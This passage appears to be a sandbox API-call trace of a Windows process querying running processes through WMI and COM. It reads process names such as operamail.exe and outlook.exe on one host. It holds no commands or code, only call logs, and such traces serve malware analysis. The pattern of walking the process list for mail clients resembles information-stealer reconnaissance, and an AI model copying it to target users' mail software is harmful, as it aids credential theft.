WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a2a8) returned 0x0 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.218] WbemDefPath:IUnknown:AddRef (This=0x552a2a8) returned 0x3 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.218] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528cb8) returned 0x0 [0265.218] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528cb8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.218] WbemDefPath:IUnknown:Release (This=0x5528cb8) returned 0x3 [0265.218] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.218] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.219] WbemDefPath:IUnknown:Release (This=0x552a2a8) returned 0x2 [0265.219] WbemDefPath:IUnknown:Release (This=0x552a2a8) returned 0x1 [0265.219] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.219] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.219] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a2a8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a2a8) returned 0x0 [0265.219] WbemDefPath:IUnknown:AddRef (This=0x552a2a8) returned 0x3 [0265.219] WbemDefPath:IUnknown:Release (This=0x552a2a8) returned 0x2 [0265.219] WbemDefPath:IWbemPath:SetText (This=0x552a2a8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1900\"") returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.219] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.219] IWbemClassObject:Get (in: This=0x55208c0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dbd7c*=0, plFlavor=0x23dbd80*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x23dbd7c*=8, plFlavor=0x23dbd80*=0) returned 0x0 [0265.220] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0265.220] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0265.220] IWbemClassObject:Get (in: This=0x55208c0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dbd7c*=8, plFlavor=0x23dbd80*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x23dbd7c*=8, plFlavor=0x23dbd80*=0) returned 0x0 [0265.220] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0265.220] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0265.220] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.220] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x5520a58, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.221] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x5520a58) returned 0x0 [0265.221] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.221] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.221] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.222] IUnknown:AddRef (This=0x5520a58) returned 0x3 [0265.222] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.222] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.222] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x5520a5c) returned 0x0 [0265.222] IMarshal:GetUnmarshalClass (in: This=0x5520a5c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.222] IUnknown:Release (This=0x5520a5c) returned 0x3 [0265.222] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.223] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.223] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.223] IUnknown:Release (This=0x5520a58) returned 0x2 [0265.223] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.223] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.223] IUnknown:QueryInterface (in: This=0x5520a58, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x5520a58) returned 0x0 [0265.223] IUnknown:AddRef (This=0x5520a58) returned 0x4 [0265.223] IUnknown:Release (This=0x5520a58) returned 0x3 [0265.223] IUnknown:Release (This=0x5520a58) returned 0x2 [0265.223] CoTaskMemFree (pv=0x54ba398) [0265.223] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.223] IUnknown:AddRef (This=0x5520a58) returned 0x3 [0265.223] IWbemClassObject:Get (in: This=0x5520a58, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.223] IWbemClassObject:Get (in: This=0x5520a58, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1976\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.224] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1976\"") returned 0x5e [0265.224] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1976\"") returned 0x5e [0265.224] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.224] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.224] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.224] IUnknown:Release (This=0x601a94) returned 0x1 [0265.226] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.226] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a628) returned 0x0 [0265.226] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a628) returned 0x0 [0265.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.226] WbemDefPath:IUnknown:AddRef (This=0x552a628) returned 0x3 [0265.226] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5528b80) returned 0x0 [0265.227] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5528b80, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.227] WbemDefPath:IUnknown:Release (This=0x5528b80) returned 0x3 [0265.227] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.227] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.227] WbemDefPath:IUnknown:Release (This=0x552a628) returned 0x2 [0265.227] WbemDefPath:IUnknown:Release (This=0x552a628) returned 0x1 [0265.227] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.227] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.227] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a628, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a628) returned 0x0 [0265.227] WbemDefPath:IUnknown:AddRef (This=0x552a628) returned 0x3 [0265.227] WbemDefPath:IUnknown:Release (This=0x552a628) returned 0x2 [0265.227] WbemDefPath:IWbemPath:SetText (This=0x552a628, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1976\"") returned 0x0 [0265.227] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.227] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.228] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.228] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.228] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.228] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.228] IWbemClassObject:Get (in: This=0x5520a58, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dc610*=0, plFlavor=0x23dc614*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x23dc610*=8, plFlavor=0x23dc614*=0) returned 0x0 [0265.228] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0265.228] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0265.228] IWbemClassObject:Get (in: This=0x5520a58, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23dc610*=8, plFlavor=0x23dc614*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="outlook.exe", varVal2=0x0), pType=0x23dc610*=8, plFlavor=0x23dc614*=0) returned 0x0 [0265.228] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0265.228] SysStringByteLen (bstr="outlook.exe") returned 0x16 [0265.228] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0265.228] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x552c368, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.231] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552c368) returned 0x0 [0265.231] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.231] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.231] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.232] IUnknown:AddRef (This=0x552c368) returned 0x3 [0265.232] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.233] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.233] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552c36c) returned 0x0 [0265.233] IMarshal:GetUnmarshalClass (in: This=0x552c36c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.233] IUnknown:Release (This=0x552c36c) returned 0x3 [0265.233] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.233] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.233] IUnknown:QueryInterface (in: This=0x552c368, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.233] IUnknown:Release (This=0x552c368) returned 0x2 [0265.233] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.233] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.233] IUnknown:QueryInterface (in: This=0x552c368, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c368) returned 0x0 [0265.233] IUnknown:AddRef (This=0x552c368) returned 0x4 [0265.234] IUnknown:Release (This=0x552c368) returned 0x3 [0265.234] IUnknown:Release (This=0x552c368) returned 0x2 [0265.234] CoTaskMemFree (pv=0x54ba2c8) [0265.234] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.234] IUnknown:AddRef (This=0x552c368) returned 0x3 [0265.234] IWbemClassObject:Get (in: This=0x552c368, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.234] IWbemClassObject:Get (in: This=0x552c368, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3980\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.234] SysStringByteLen 